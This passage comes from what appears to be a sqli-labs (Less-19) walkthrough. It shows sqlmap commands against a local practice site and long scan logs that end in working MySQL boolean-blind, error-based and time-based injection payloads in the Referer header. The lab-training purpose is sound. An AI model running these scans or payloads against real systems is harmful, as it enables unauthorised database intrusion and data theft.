[12:33:07] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:33:17] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[12:33:19] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:33:29] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[12:33:40] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[12:33:50] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[12:34:00] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[12:34:02] [INFO] testing 'Generic inline queries'
[12:34:04] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[12:34:12] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[12:34:20] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[12:34:28] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[12:34:39] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[12:34:49] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[12:34:59] [INFO] testing 'Oracle AND time-based blind'
[12:35:09] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[12:35:29] [WARNING] POST parameter 'submit' does not seem to be injectable
[12:35:29] [ERROR] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent', skipping to the next form
[12:35:29] [INFO] you can find results of scanning in multiple targets mode inside the CSV file 'XXX\sqlmap\output\results-03102020_1227pm.csv'

[*] ending @ 12:35:29 /2020-03-10/


No injection point is found.
(2) Testing with --data:

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-19/ --data="uname=admin&passwd=admin" --banner --batch

Output:

        ___
       __H__
 ___ ___[']_____ ___ ___  {1.4.2.31#dev}
|_ -| . [)]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:38:46 /2020-03-10/

[12:38:46] [INFO] testing connection to the target URL
[12:38:50] [INFO] testing if the target URL content is stable
[12:38:55] [INFO] target URL content is stable
[12:38:55] [INFO] testing if POST parameter 'uname' is dynamic
[12:38:57] [INFO] POST parameter 'uname' appears to be dynamic
[12:38:59] [WARNING] heuristic (basic) test shows that POST parameter 'uname' might not be injectable
[12:39:01] [INFO] testing for SQL injection on POST parameter 'uname'
[12:39:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:39:21] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[12:39:25] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:39:35] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[12:39:45] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[12:39:56] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[12:40:06] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[12:40:08] [INFO] testing 'Generic inline queries'
[12:40:10] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[12:40:18] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[12:40:26] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[12:40:34] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[12:40:44] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[12:40:55] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[12:41:05] [INFO] testing 'Oracle AND time-based blind'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[12:41:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[12:41:25] [WARNING] POST parameter 'uname' does not seem to be injectable
[12:41:25] [INFO] testing if POST parameter 'passwd' is dynamic
[12:41:27] [INFO] POST parameter 'passwd' appears to be dynamic
[12:41:29] [WARNING] heuristic (basic) test shows that POST parameter 'passwd' might not be injectable
[12:41:31] [INFO] testing for SQL injection on POST parameter 'passwd'
[12:41:31] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:41:51] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[12:41:55] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:42:06] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[12:42:16] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[12:42:26] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[12:42:36] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[12:42:38] [INFO] testing 'Generic inline queries'
[12:42:40] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[12:42:48] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[12:42:56] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[12:43:05] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[12:43:15] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[12:43:25] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[12:43:35] [INFO] testing 'Oracle AND time-based blind'
[12:43:45] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[12:43:55] [WARNING] POST parameter 'passwd' does not seem to be injectable
[12:43:55] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'

[*] ending @ 12:43:55 /2020-03-10/


Again no injection point is found; one can raise the risk level, or specify the injection point in a file and probe that.
(3) Testing with * marked in a file:

First create and save a file like this:
[Figure: sqlmap Referer test]
The injection point is marked with *.
Then test with that file:

python sqlmap.py -r C:\Users\Lenovo\Desktop\target.txt --banner --batch --level 3 --dbms mysql

Output:

        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.4.2.31#dev}
|_ -| . [.]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:18:18 /2020-03-10/

[13:18:18] [INFO] parsing HTTP request from 'XXXX\target.txt'
custom injection marker ('*') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q] Y
Cookie parameter 'csrftoken' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests? [y/N] N
[13:18:18] [INFO] testing connection to the target URL
[13:18:20] [INFO] testing if the target URL content is stable
[13:18:23] [INFO] target URL content is stable
[13:18:23] [INFO] testing if (custom) HEADER parameter 'Referer #1*' is dynamic
[13:18:25] [WARNING] (custom) HEADER parameter 'Referer #1*' does not appear to be dynamic
[13:18:27] [INFO] heuristic (basic) test shows that (custom) HEADER parameter 'Referer #1*' might be injectable (possible DBMS: 'MySQL')
[13:18:29] [INFO] heuristic (XSS) test shows that (custom) HEADER parameter 'Referer #1*' might be vulnerable to cross-site scripting (XSS) attacks
[13:18:29] [INFO] testing for SQL injection on (custom) HEADER parameter 'Referer #1*'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[13:18:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:18:31] [WARNING] reflective value(s) found and filtering out
[13:18:49] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[13:18:53] [INFO] testing 'Generic inline queries'
[13:18:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[13:20:21] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[13:21:36] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[13:23:01] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[13:23:52] [INFO] (custom) HEADER parameter 'Referer #1*' appears to be 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable (with --not-string="not")
[13:23:52] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[13:23:54] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[13:23:56] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[13:23:58] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[13:24:00] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[13:24:02] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[13:24:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[13:24:06] [INFO] (custom) HEADER parameter 'Referer #1*' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[13:24:06] [INFO] testing 'MySQL inline queries'
[13:24:08] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[13:24:10] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[13:24:13] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[13:24:15] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[13:24:17] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[13:24:19] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[13:24:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[13:24:37] [INFO] (custom) HEADER parameter 'Referer #1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[13:24:37] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[13:24:37] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[13:25:19] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[13:26:02] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[13:26:47] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
[13:27:27] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns'
[13:28:08] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns'
[13:28:49] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns'
[13:29:29] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns'
[13:30:10] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns'
[13:30:51] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns'
[13:31:31] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
(custom) HEADER parameter 'Referer #1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 400 HTTP(s) requests:
---
Parameter: Referer #1* ((custom) HEADER)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: http://127.0.0.1/sqli-labs/Less-19/' RLIKE (SELECT (CASE WHEN (1118=1118) THEN 0x687474703a2f2f3132372e302e302e312f73716c692d6c6162732f4c6573732d31392f ELSE 0x28 END)) AND 'dFqT'='dFqT

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: http://127.0.0.1/sqli-labs/Less-19/' AND (SELECT 8908 FROM(SELECT COUNT(*),CONCAT(0x7162767071,(SELECT (ELT(8908=8908,1))),0x71706a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'XYkp'='XYkp

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: http://127.0.0.1/sqli-labs/Less-19/' AND (SELECT 1215 FROM (SELECT(SLEEP(5)))FoGI) AND 'SBOH'='SBOH
---
[13:32:12] [INFO] the back-end DBMS is MySQL
[13:32:12] [INFO] fetching banner
[13:32:22] [INFO] retrieved: '5.5.53'
[13:32:33] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
banner: '5.5.53'
[13:32:33] [INFO] fetched data logged to text files under 'XXX\sqlmap\output\127.0.0.1'

[*] ending @ 13:32:33 /2020-03-10/


Clearly, an injection point is detected this time, which shows that the POST parameters of the request contain no injection point.
The Referer can also be set to *, i.e.


Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Referer: *
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9

Run the test again; the output is:

         ___
       __H__
 ___ ___[.]_____ ___ ___  {1.4.2.31#dev}
|_ -| . [)]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 18:54:22 /2020-03-10/

[18:54:22] [INFO] parsing HTTP request from 'XXXX\target.txt'
[18:54:22] [INFO] found a total of 2 targets
URL 1:
GET http://127.0.0.1:80/sqli-labs/Less-19/
Cookie: csrftoken=gdhsRRG8COXmUmcoRBvbc259rYnbPKXFpEiggOHQF9MZxMkmBsX8zavVCyuWB7oF
do you want to test this URL? [Y/n/q]
> Y
[18:54:23] [INFO] testing URL 'http://127.0.0.1:80/sqli-labs/Less-19/'
[18:54:23] [WARNING] detected empty POST body
custom injection marker ('*') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q] Y
Cookie parameter 'csrftoken' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests? [y/N] N
[18:54:23] [INFO] using 'XXX\sqlmap\output\results-03102020_0654pm.csv' as the CSV results file in multiple targets mode
[18:54:23] [INFO] testing connection to the target URL
[18:54:25] [INFO] testing if the target URL content is stable
[18:54:27] [INFO] target URL content is stable
[18:54:27] [INFO] testing if (custom) HEADER parameter 'Referer #1*' is dynamic
[18:54:29] [WARNING] (custom) HEADER parameter 'Referer #1*' does not appear to be dynamic
[18:54:31] [WARNING] heuristic (basic) test shows that (custom) HEADER parameter 'Referer #1*' might not be injectable
[18:54:33] [INFO] testing for SQL injection on (custom) HEADER parameter 'Referer #1*'
[18:54:33] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:55:16] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[18:55:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[18:56:00] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[18:56:02] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
[18:56:04] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL - original value)'
[18:56:07] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
[18:56:09] [INFO] testing 'Boolean-based blind - Parameter replace (CASE - original value)'
[18:56:11] [INFO] testing 'HAVING boolean-based blind - WHERE, GROUP BY clause'
[18:56:53] [INFO] testing 'Generic inline queries'
[18:56:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[18:57:18] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:58:00] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[18:58:43] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[18:58:47] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[18:58:51] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[18:58:51] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[18:59:34] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[19:00:16] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[19:00:59] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[19:01:42] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[19:02:24] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[19:02:26] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[19:02:28] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[19:02:33] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[19:02:37] [INFO] testing 'MySQL inline queries'
[19:02:39] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[19:03:01] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[19:03:44] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[19:04:06] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[19:04:49] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[19:05:31] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[19:05:54] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[19:06:16] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[19:06:59] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[19:07:41] [INFO] testing 'MySQL AND time-based blind (ELT)'
[19:08:24] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[19:08:26] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[19:08:28] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[19:08:32] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:09:57] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
[19:11:22] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:12:47] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[19:14:13] [WARNING] (custom) HEADER parameter 'Referer #1*' does not seem to be injectable
[19:14:13] [ERROR] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent', skipping to the next URL
URL 2:
GET http://127.0.0.1/sqli-labs/Less-19/
Cookie: csrftoken=gdhsRRG8COXmUmcoRBvbc259rYnbPKXFpEiggOHQF9MZxMkmBsX8zavVCyuWB7oF
do you want to test this URL? [Y/n/q]
> Y
[19:14:13] [INFO] testing URL 'http://127.0.0.1/sqli-labs/Less-19/'
[19:14:13] [WARNING] detected empty POST body
Cookie parameter 'csrftoken' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests? [y/N] N
[19:14:13] [INFO] testing connection to the target URL
[19:14:15] [INFO] testing if the target URL content is stable
[19:14:17] [INFO] target URL content is stable
[19:14:17] [INFO] ignoring Cookie parameter 'csrftoken'
[19:14:17] [INFO] testing if parameter 'User-Agent' is dynamic
[19:14:19] [WARNING] parameter 'User-Agent' does not appear to be dynamic
[19:14:21] [WARNING] heuristic (basic) test shows that parameter 'User-Agent' might not be injectable
[19:14:23] [INFO] testing for SQL injection on parameter 'User-Agent'
[19:14:23] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:15:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[19:15:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[19:15:50] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[19:15:52] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
[19:15:55] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL - original value)'
[19:15:57] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
[19:15:59] [INFO] testing 'Boolean-based blind - Parameter replace (CASE - original value)'
[19:16:01] [INFO] testing 'HAVING boolean-based blind - WHERE, GROUP BY clause'
[19:16:43] [INFO] testing 'Generic inline queries'
[19:16:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[19:17:08] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:17:50] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[19:18:33] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[19:18:37] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[19:18:41] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[19:18:41] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[19:19:24] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[19:20:06] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[19:20:49] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[19:21:31] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[19:22:14] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[19:22:16] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[19:22:18] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[19:22:22] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[19:22:26] [INFO] testing 'MySQL inline queries'
[19:22:28] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[19:22:51] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[19:23:33] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[19:23:55] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[19:24:38] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[19:25:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[19:25:43] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[19:26:05] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[19:26:48] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[19:27:31] [INFO] testing 'MySQL AND time-based blind (ELT)'
[19:28:13] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[19:28:15] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[19:28:17] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[19:28:21] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:29:47] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
[19:31:12] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:32:37] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[19:34:02] [WARNING] parameter 'User-Agent' does not seem to be injectable
[19:34:02] [INFO] testing if parameter 'Referer' is dynamic
[19:34:04] [WARNING] parameter 'Referer' does not appear to be dynamic
[19:34:06] [WARNING] heuristic (basic) test shows that parameter 'Referer' might not be injectable
[19:34:08] [INFO] testing for SQL injection on parameter 'Referer'
[19:34:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:34:51] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[19:35:13] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[19:35:36] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[19:35:38] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
[19:35:40] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL - original value)'
[19:35:42] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
[19:35:44] [INFO] testing 'Boolean-based blind - Parameter replace (CASE - original value)'
[19:35:46] [INFO] testing 'HAVING boolean-based blind - WHERE, GROUP BY clause'
[19:36:29] [INFO] testing 'Generic inline queries'
[19:36:31] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[19:36:53] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:37:36] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[19:38:18] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[19:38:22] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[19:38:26] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[19:38:26] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[19:39:09] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[19:39:51] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[19:40:34] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[19:41:17] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[19:41:59] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[19:42:01] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[19:42:03] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[19:42:07] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[19:42:12] [INFO] testing 'MySQL inline queries'
[19:42:14] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[19:42:36] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[19:43:18] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[19:43:41] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[19:44:23] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[19:45:06] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[19:45:28] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[19:45:51] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[19:46:33] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[19:47:16] [INFO] testing 'MySQL AND time-based blind (ELT)'
[19:47:58] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[19:48:00] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[19:48:02] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[19:48:06] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:49:32] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
[19:50:57] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:52:22] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[19:53:47] [WARNING] parameter 'Referer' does not seem to be injectable
